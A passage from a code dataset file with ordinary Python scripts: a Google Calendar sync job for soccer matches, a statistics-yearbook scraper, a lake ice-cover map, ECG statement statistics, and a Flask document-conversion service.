{"api_name": "bpy.utils", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 64, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.utils.previews.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 71, "usage_type": "attribute"}]}
+{"seq_id": "166268229", "text": "import datetime\nimport logging\nimport os\nimport pathlib\nimport pymongo\n\nfrom soccer.gcal.gcal import get_calendar_service, create_event, delete_event, get_past_events_id_list\nfrom soccer.pipelines import SoccerMongoDBPipeline\nfrom soccer.utils import get_end_time, datetime_object_to_str\n\n\nclass AllTeamsCalendarJob(object):\n APPLICATION_NAME_TUPLE = ('US National Teams Google Calendar', 'all-teams')\n APPLICATION_SCOPE = 'all'\n CALENDAR_ID = 'kpdvbqkv4bo726acao7v7v57io@group.calendar.google.com'\n\n def __init__(self):\n self.db = SoccerMongoDBPipeline()\n self.service = get_calendar_service(self.APPLICATION_NAME_TUPLE, self.APPLICATION_SCOPE)\n self.logger = logging.getLogger('AllTeamsCalendarJob')\n\n def run(self):\n self.delete_past_events()\n self.create_or_update_events()\n self.delete_old_html_and_json()\n\n def delete_past_events(self):\n for event_id in get_past_events_id_list(self.service, self.CALENDAR_ID):\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def delete_replaced_events(self):\n replaced_events_gcal_id_list = set([x['gcal_id'] for x in self.db.collection.find({'status': 'replaced'})])\n for event_id in replaced_events_gcal_id_list:\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def create_event_body(self, match):\n watch_list = match['watch_list'] if match['watch_list'] else []\n watch_url_list = match['watch_url_list'] if match['watch_url_list'] else []\n details_to_join = filter(None, [match['match_detail_url'],\n 'Watch:',\n ', '.join(watch_list),\n ', '.join(watch_url_list),\n 'Tickets:', match['ticket_info_url'],\n match['buy_tickets_url']])\n\n details = '\\n'.join(details_to_join)\n start_datetime = datetime_object_to_str(match['date_and_time'], '%Y-%m-%dT%H:%M:%S')\n # Google api doesn't accept 'Utc/Zulu'. Use Iceland's time which is Zulu time.\n event = {'summary': match['home_team'] + ' vs ' + match['opposing_team'],\n 'location': match['venue'],\n 'description': details,\n 'start': {'dateTime': start_datetime + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'end': {'dateTime': get_end_time(start_datetime, date_format='%Y-%m-%dT%H:%M:%S') + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'reminders': {'useDefault': True}\n }\n return event\n\n def create_or_update_events(self):\n all_matches = self.db.collection.find({\"status\": {\"$ne\": \"replaced\"}, \"date_and_time\": {\"$gte\": datetime.datetime.today()}})\n for match in all_matches:\n event_body = self.create_event_body(match)\n\n # If match has gcal_id, the event has already been created\n event_exists = dict(match).get('gcal_id')\n if event_exists:\n # Going with always update, seems easiest. No need to convert times etc\n # Not necessary now, but in the future, might want to check modified time on db and only update if\n # it's recent\n updated = self.service.events().update(calendarId=self.CALENDAR_ID,\n eventId=match['gcal_id'],\n body=event_body).execute()\n self.logger.info(\"{} updated\".format(updated['summary']))\n\n # if event doesnt exist, create one\n else:\n created = create_event(self.service, self.CALENDAR_ID, event_body)\n if created['status'] == 'confirmed':\n gcal_id = created['id']\n modified = datetime.datetime.utcnow()\n self.db.collection.find_one_and_update({'match_detail_url': match['match_detail_url']},\n {'$set': {'gcal_id': gcal_id, 'modified': modified}})\n self.logger.info(\"{} created and event_id saved.\".format(created['summary']))\n\n def clean_up_duplicate_events(self, delete_url_changes=True):\n # This might be something that is caused by derps in the script being run manually?\n event_id_set = set([x['id'] for x in self.service.events().list(calendarId=self.CALENDAR_ID).execute()['items']])\n cursor = self.db.collection.find()\n gcal_id_set = set(filter(None, [x.get('gcal_id') for x in cursor]))\n to_delete = event_id_set - gcal_id_set\n for event_id in to_delete:\n delete_event(self.service, self.CALENDAR_ID, event_id)\n if delete_url_changes:\n self.clean_up_duplicate_from_url_changes()\n\n def clean_up_duplicate_from_url_changes(self):\n # Sometimes the same match has their url changed after being posted.\n # This causes a problem because that url is used as unique key in the db.\n # We could use home_team-opp_team-date as unique key but this would create problem for past events since their date would be null\n # So, I will keep the duplicates in the db but clean them up here before being posted to gcal\n # just want to be safe and include one extra day\n collection = self.db.collection\n for match in self.db.collection.aggregate(\n [{'$group':\n {'_id': {'home': '$home_team', 'opp': '$opposing_team'},\n 'count': {'$sum': 1}}\n }]):\n if match['count'] > 1:\n home_team, opp_team = match['_id']['home'], match['_id']['opp']\n pivot = collection.find({'home_team': home_team, 'opposing_team': opp_team}).sort('created', pymongo.DESCENDING)[0]\n if not pivot['date_and_time']:\n # skip past events\n continue\n start = pivot['date_and_time'] - datetime.timedelta(days=1)\n end = pivot['date_and_time'] + datetime.timedelta(days=1)\n # get all having same home team n opp team.\n # If the dates are fairly close (within 24 hours), then get the last created n set the rest to have status = \"replaced\"\n collection.update({'home_team': home_team, 'opposing_team': opp_team,\n 'gcal_id': {'$ne': pivot['gcal_id']},\n 'date_and_time': {'$gte': start, '$lte': end}},\n {'$set': {'status': 'replaced'}}, multi=True)\n\n def delete_old_html_and_json(self):\n repo_dir = pathlib.Path(__file__).parents[2].__str__()\n html_dir = os.path.join(repo_dir, 'html_files')\n json_dir = os.path.join(repo_dir, 'items')\n last_month = datetime.datetime.today() - datetime.timedelta(days=30)\n for _, _, filelist in os.walk(html_dir):\n for f in filelist:\n fdate_string = f.split('_')[0]\n try:\n fdate = datetime.datetime.strptime(fdate_string, '%Y%m%d')\n except ValueError:\n continue\n if fdate < last_month:\n html_file = os.path.join(html_dir, f)\n json_file = os.path.join(json_dir, f.rsplit('_', 1)[0] + '.json')\n for x in (html_file, json_file):\n self._delete_file(x)\n\n def _delete_file(self, fpath):\n if os.path.isfile(fpath):\n os.remove(fpath)\n\n\nif __name__ == '__main__':\n AllTeamsCalendarJob().run()\n AllTeamsCalendarJob().clean_up_duplicate_events()\n # AllTeamsCalendarJob().delete_replaced_events()\n", "sub_path": "soccer/gcal/all_teams.py", "file_name": "all_teams.py", "file_ext": "py", "file_size_in_byte": 7881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "soccer.pipelines.SoccerMongoDBPipeline", "line_number": 18, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_calendar_service", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_past_events_id_list", "line_number": 28, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 29, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 34, "usage_type": "call"}, {"api_name": "soccer.utils.datetime_object_to_str", "line_number": 47, "usage_type": "call"}, {"api_name": "soccer.utils.get_end_time", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.create_event", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 93, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 116, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 128, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 144, "usage_type": "call"}]}
+{"seq_id": "580906518", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.request\nimport time\nimport csv\n\n\ndef get_request_years():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n page = requests.get(\"http://www.stats.gov.cn/tjsj/ndsj/\", headers = headers)\n\n html = BeautifulSoup(page.content, 'html.parser')\n table = html.find('table', 'ztzw_tab')\n print(table)\n links = table.findAll('a')\n years_hrefs = []\n for link in links:\n years_hrefs.append(link['href'])\n\n print(years_hrefs)\n return years_hrefs\n\n\n\n\ndef get_data_for_year(year):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n left_link = re.sub('indexch', 'left', year)\n base_link = re.sub('indexch.htm', '', year)\n base_year = re.findall('\\d+', base_link)[0]\n year_page = requests.get(left_link, headers=headers)\n year_html = BeautifulSoup(year_page.content)\n if len(year_html.findAll('ul', {'id': 'foldinglist'})) != 0:\n folding_lists = year_html.findAll('ul', {'id': 'foldinglist'})\n else:\n folding_lists = year_html.findAll('ul', {'id': re.compile('divOne_*')})\n\n\n for folding_list in folding_lists:\n li_lists = folding_list.findAll('li')\n\n for li_list in li_lists:\n file = li_list.find(\"a\").get('href')\n name = li_list.find(\"a\").text.strip()\n name = re.sub('\\W+', '', name)\n print(file)\n\n if '.jpg' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n urllib.request.urlretrieve(base_link + file,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.jpg')\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n elif '简要说明' in name:\n pass\n elif '主要统计指标解释' in name:\n pass\n elif '.htm' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n print(file)\n print(base_link)\n add = re.sub(r'\\b.htm\\b', '.xls', base_link + file)\n print(add)\n urllib.request.urlretrieve(add,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.xls')\n\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n\n\n else:\n raise Exception(\"cause of the problem\")\n\ndef flow():\n years_hrefs = get_request_years()\n for year_href in years_hrefs:\n print(year_href)\n get_data_for_year(year_href)\n\n\n\nif __name__== \"__main__\":\n flow()\n", "sub_path": "get_stat_data.py", "file_name": "get_stat_data.py", "file_ext": "py", "file_size_in_byte": 3595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 59, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 59, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "322139505", "text": "import fiona\nimport numpy as np\nimport pandas as pd \nimport geopandas as gpd\nimport shapely\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport descartes\nfrom sklearn.linear_model import LogisticRegression\nimport geoplot as gplt\nimport geoplot.crs as gcrs\nimport joblib\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.feature_selection import RFE\nimport statsmodels.api as sm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\n\nRES_CONST = 0.25\npd.set_option('display.max_columns', None)\n\n\ninfile1 =\"https://pasta.lternet.edu/package/data/eml/edi/267/2/1c716f66bf3572a37a9f67035f9e02ac\".strip() \ninfile1 = infile1.replace(\"https://\",\"http://\")\n \ndt1 =pd.read_csv(infile1 \n ,skiprows=1\n ,sep=\",\" \n ,quotechar='\"' \n , names=[\n \"lakecode\", \n \"lakename\", \n \"continent\", \n \"country\", \n \"state\", \n \"IntermittentIceCover\", \n \"Latitude_dd\", \n \"Longitude_dd\", \n \"Elevation_m\", \n \"MeanAnnualAirTemp_c\", \n \"SurfaceArea_km2\", \n \"MeanDepth_m\", \n \"MaximumDepth_m\", \n \"Volume_mcm\", \n \"WatershedArea_km2\", \n \"ShorelineLength_km\", \n \"ResidenceTime_days\", \n \"MeanDischarge_m3_sec\", \n \"Slope_degrees\", \n \"ShorelineDevelopment\", \n \"JFMCloudCover_perc\", \n \"JFMPrecipitation_mm\", \n \"DistanceToCoast_km\", \n \"MaximumDistanceToLand_km\" ]\n )\n# Coerce the data into the types specified in the metadata \ndt1.lakecode=dt1.lakecode.astype('category') \ndt1.lakename=dt1.lakename.astype('category') \ndt1.continent=dt1.continent.astype('category') \ndt1.country=dt1.country.astype('category') \ndt1.state=dt1.state.astype('category') \ndt1.IntermittentIceCover=dt1.IntermittentIceCover.astype('category') \ndt1.Latitude_dd=pd.to_numeric(dt1.Latitude_dd,errors='coerce') \ndt1.Longitude_dd=pd.to_numeric(dt1.Longitude_dd,errors='coerce') \ndt1.Elevation_m=pd.to_numeric(dt1.Elevation_m,errors='coerce') \ndt1.MeanAnnualAirTemp_c=pd.to_numeric(dt1.MeanAnnualAirTemp_c,errors='coerce') \ndt1.SurfaceArea_km2=pd.to_numeric(dt1.SurfaceArea_km2,errors='coerce') \ndt1.MeanDepth_m=pd.to_numeric(dt1.MeanDepth_m,errors='coerce') \ndt1.MaximumDepth_m=pd.to_numeric(dt1.MaximumDepth_m,errors='coerce') \ndt1.Volume_mcm=pd.to_numeric(dt1.Volume_mcm,errors='coerce') \ndt1.WatershedArea_km2=pd.to_numeric(dt1.WatershedArea_km2,errors='coerce') \ndt1.ShorelineLength_km=pd.to_numeric(dt1.ShorelineLength_km,errors='coerce') \ndt1.ResidenceTime_days=pd.to_numeric(dt1.ResidenceTime_days,errors='coerce') \ndt1.MeanDischarge_m3_sec=pd.to_numeric(dt1.MeanDischarge_m3_sec,errors='coerce') \ndt1.Slope_degrees=pd.to_numeric(dt1.Slope_degrees,errors='coerce') \ndt1.ShorelineDevelopment=pd.to_numeric(dt1.ShorelineDevelopment,errors='coerce') \ndt1.JFMCloudCover_perc=pd.to_numeric(dt1.JFMCloudCover_perc,errors='coerce') \ndt1.JFMPrecipitation_mm=pd.to_numeric(dt1.JFMPrecipitation_mm,errors='coerce') \ndt1.DistanceToCoast_km=pd.to_numeric(dt1.DistanceToCoast_km,errors='coerce') \ndt1.MaximumDistanceToLand_km=pd.to_numeric(dt1.MaximumDistanceToLand_km,errors='coerce') \n\ndt = dt1.filter(['Latitude_dd', 'Longitude_dd', 'IntermittentIceCover'])\ndt['IntermittentIceCover'] = dt['IntermittentIceCover'].map({'Y': 1, 'N': 0})\n\ndt = gpd.GeoDataFrame(dt, geometry = gpd.points_from_xy(dt.Longitude_dd, dt.Latitude_dd))\n\nannualLakes= dt[dt['IntermittentIceCover']==0]\nprint(annualLakes.shape)\nintermittentLakes= dt[dt['IntermittentIceCover']==1]\nprint(intermittentLakes.shape)\n\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\n\nax = gplt.polyplot(world, projection=gplt.crs.NorthPolarStereo(), facecolor='whitesmoke', figsize = (15, 15))\n\ngplt.pointplot(annualLakes, color = 'black', ax = ax, s = 10, label = 'Annual winter ice')\ngplt.pointplot(intermittentLakes, color = 'tab:orange', ax = ax, s = 10, label = 'Intermittent winter ice')\nlgnd = plt.legend(loc=\"lower left\", scatterpoints=1, fontsize=18)\nlgnd.legendHandles[0]._sizes = [100]\nlgnd.legendHandles[1]._sizes = [100]\nplt.savefig('trainingLakeMap.png', bbox_inches='tight')\nplt.clf()\n", "sub_path": "trainingMap.py", "file_name": "trainingMap.py", "file_ext": "py", "file_size_in_byte": 4823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 85, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets.get_path", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets", "line_number": 97, "usage_type": "attribute"}, {"api_name": "geoplot.polyplot", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs.NorthPolarStereo", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "geoplot.pointplot", "line_number": 101, "usage_type": "call"}, {"api_name": "geoplot.pointplot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]}
+{"seq_id": "191366773", "text": "import os\nfrom configparser import ConfigParser\n\nimport pandas as pd\nfrom ecgpandas.loader import Loader\n\n\ndef statistics(statements, original_statements, lookup):\n print(\"With multi and modifiers\")\n added_and_removed(original_statements, statements)\n\n print(\"With multi and no modifiers\")\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original_statements = pd.merge(original_statements, statement_types, left_on='Statement', right_index=True)\n\n statements = statements.loc[statements.Type == 2]\n original_statements = original_statements.loc[original_statements.Type == 2]\n\n statements.drop('Type', axis=1, inplace=True)\n original_statements.drop('Type', axis=1, inplace=True)\n\n added_and_removed(original_statements, statements)\n\n print(\"No multi and no modifiers\")\n statements = statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n original_statements = original_statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n\n added_and_removed(original_statements, statements)\n\n print(\"Most important, our data set\")\n iterative_count_differences(original_statements, statements)\n\n\ndef iterative_count_differences(original, statements):\n original.set_index(['PatientID', 'Date'], inplace=True)\n statements.set_index(['PatientID', 'Date'], inplace=True)\n\n original.drop('index', axis=1, inplace=True)\n statements.drop('index', axis=1, inplace=True)\n\n\n original_dict = original.squeeze().to_dict()\n statement_dict = statements.squeeze().to_dict()\n\n total = statements.shape[0]\n changed = 0\n\n for idx in statement_dict.keys():\n if idx in original_dict:\n if statement_dict[idx] != original_dict[idx]:\n changed += 1\n\n\n print(\"Ratio changed records by doctors {}\".format(changed/total))\n\n\ndef added_and_removed(original_statements, statements):\n statements.reset_index(inplace=True)\n original_statements.reset_index(inplace=True)\n records_with_added = statements.merge(original_statements.drop_duplicates(), on=['PatientID', 'Date', 'Statement'],\n how='left', indicator=True)\n records_with_added = records_with_added.loc[records_with_added._merge == 'left_only']\n records_with_added.set_index(['PatientID', 'Date'], inplace=True)\n number_with_added = records_with_added.index.unique().shape[0]\n ratio_records_with_added_statements = number_with_added / statements.index.unique().shape[0]\n print(\"Ratio changed records with added statments by doctors {}\".format(ratio_records_with_added_statements))\n records_with_removed = statements.merge(original_statements.drop_duplicates(),\n on=['PatientID', 'Date', 'Statement'], how='right', indicator=True)\n records_with_removed = records_with_removed.loc[records_with_removed._merge == 'right_only']\n records_with_removed.set_index(['PatientID', 'Date'], inplace=True)\n number_with_removed = records_with_removed.index.unique().shape[0]\n ratio_records_with_removed_statements = number_with_removed / statements.index.unique().shape[0]\n print(\"Ratio changed records with removed statments by doctors {}\".format(ratio_records_with_removed_statements))\n\n\ndef smart_stats(original, statements):\n pass\n\ndef main():\n config_parser = ConfigParser(allow_no_value=True)\n config_parser.read(\"../local.conf\")\n\n path = config_parser.get('Default', 'Path')\n\n statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\", \"statement.csv\")\n original_statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\",\n \"original_statement.csv\")\n\n print(\"Loading statements and machine generated statements\")\n statements = pd.read_csv(statements_path)\n original = pd.read_csv(original_statements_path)\n\n statements.set_index([\"PatientID\", \"Date\"], inplace=True)\n original.set_index([\"PatientID\", \"Date\"], inplace=True)\n\n lookup = Loader(path).load_statement_lookup()\n\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original = pd.merge(original, statement_types, left_on='Statement', right_index=True)\n\n smart_stats(original, statements)\n\n # statistics(statements, original_statements, lookup)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "statistics/original_vs_newdiagnoses.py", "file_name": "original_vs_newdiagnoses.py", "file_ext": "py", "file_size_in_byte": 4657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 15, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 92, "usage_type": "call"}, {"api_name": "ecgpandas.loader.Loader", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "505005378", "text": "import os\nimport logging\nimport traceback\nfrom threading import RLock\nfrom flask import Flask, request, send_file\nfrom tempfile import mkstemp\nfrom werkzeug.wsgi import ClosingIterator\nfrom werkzeug.exceptions import HTTPException\nfrom pantomime import FileName, normalize_mimetype, mimetype_extension\n\nfrom convert.converter import Converter, ConversionFailure\nfrom convert.formats import load_mime_extensions\nfrom .document_types import *\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger('convert')\nlock = RLock()\nextensions = load_mime_extensions()\nconverter = Converter()\n\n\nclass ShutdownMiddleware:\n def __init__(self, application):\n self.application = application\n\n def post_request(self):\n if app.is_dead:\n os._exit(127)\n\n def __call__(self, environ, after_response):\n iterator = self.application(environ, after_response)\n try:\n return ClosingIterator(iterator, [self.post_request])\n except Exception:\n traceback.print_exc()\n return iterator\n\n\napp = Flask(\"convert\")\napp.is_dead = False\napp.wsgi_app = ShutdownMiddleware(app.wsgi_app)\n\n\n@app.route(\"/\")\ndef info():\n if app.is_dead:\n return (\"BUSY\", 503)\n return (\"OK\", 200)\n\n\n@app.route(\"/convert\", methods=['POST'])\ndef convert():\n acquired = lock.acquire(timeout=1)\n if app.is_dead or not acquired:\n return (\"BUSY\", 503)\n timeout = int(request.args.get('timeout', 1000))\n upload_file = None\n output_format = request.form.get('format')\n if not output_format in LIBREOFFICE_EXPORT_TYPES:\n return (\"%s format is not supported\" % (output_format), 400)\n try:\n for upload in request.files.values():\n file_name = FileName(upload.filename)\n mime_type = normalize_mimetype(upload.mimetype)\n if not file_name.has_extension:\n file_name.extension = extensions.get(mime_type)\n if not file_name.has_extension:\n file_name.extension = mimetype_extension(mime_type)\n fd, upload_file = mkstemp(suffix=file_name.safe())\n os.close(fd)\n log.info('Convert to %s: %s [%s]',\n output_format, upload_file, mime_type)\n upload.save(upload_file)\n converter.convert_file(upload_file, output_format, timeout)\n output_filename = \"%s.%s\" % (converter.OUT, output_format)\n log.info(\"Send file %s [Mime-type: %s]\" %\n (output_filename, OUTPUT_MIME_TYPES[output_format]))\n return send_file(output_filename,\n mimetype=OUTPUT_MIME_TYPES[output_format],\n attachment_filename=output_filename)\n return ('No file uploaded', 400)\n except HTTPException:\n raise\n except ConversionFailure as ex:\n app.is_dead = True\n return (str(ex), 400)\n except Exception as ex:\n app.is_dead = True\n log.error('Error: %s', ex)\n return ('FAIL', 503)\n finally:\n if upload_file is not None and os.path.exists(upload_file):\n os.unlink(upload_file)\n if os.path.exists(converter.OUT):\n os.unlink(converter.OUT)\n lock.release()\n", "sub_path": "convert/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.RLock", "line_number": 17, "usage_type": "call"}, {"api_name": "convert.formats.load_mime_extensions", "line_number": 18, "usage_type": "call"}, {"api_name": "convert.converter.Converter", "line_number": 19, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wsgi.ClosingIterator", "line_number": 33, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.files.values", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "pantomime.FileName", "line_number": 63, "usage_type": "call"}, {"api_name": 